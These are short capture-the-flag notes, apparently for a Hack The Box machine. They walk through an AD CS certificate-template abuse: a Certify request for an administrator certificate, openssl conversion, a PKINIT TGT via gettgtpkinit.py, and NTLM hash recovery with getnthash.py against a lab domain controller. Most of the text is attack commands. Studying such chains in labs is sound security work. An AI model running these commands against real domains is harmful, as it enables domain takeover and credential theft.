AD CS

Certificate enrollment

Non-privileged users can request a certificate from the Enterprise Certificate Authority for any of the existing templates which are available for enrollment.

.\Certify.exe find /vulnerable

Certificate extraction

.\Certify.exe request /template:UserAuthentication /ca:dc.sequel.htb\sequel-DC-CA /altname:administrator@sequel.htb

-----BEGIN RSA PRIVATE KEY-----
[...]
-----END CERTIFICATE-----

User persistence

Certificates that have been exported in .pem format can be converted to .pfx in order to be compatible with Rubeus and installed directly into the certificate store. This is because certificates in .pfx format are similar to archives and contain all the necessary information to be deployed on the system.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

A Ticket Granting Ticket (TGT) can be requested with Rubeus from the Kerberos Key Distribution Center (KDC) for the enrolled user.

Similarly to Rubeus the TGT can be obtained using the “gettgtpkinit.py” by supplying the pfx certificate and the user which the certificate has been issued. This script will output a TGT into the specified ccache file.

python3 gettgtpkinit.py sequel.htb/Administrator -cert-pfx ~/HTB/Machines/Escape/cert.pfx ticket.ccache -dc-ip 10.10.11.202

To use getnthash.py, set the TGT file path in the KRB5CCNAME environment variable.

export KRB5CCNAME=/home/kali/Tools/PKINITtools/ticket.ccache

The AES-REP encryption key which has been retrieved previously can be used with the getnthash.py utility in order to recover the NTLM hash from the PAC.

python3 getnthash.py sequel.htb/Administrator -key c32342c92f2ba6288f7c90652b5eec9a74ef76741504fa38778656019ee14011 -dc-ip 10.10.11.202

Sometimes, the following error is obtained when using the PKINIT tools:

KRB_AP_ERR_SKEW Detail: "The clock skew is too great"

In that case, run the following command:

sudo ntpdate <DC IP>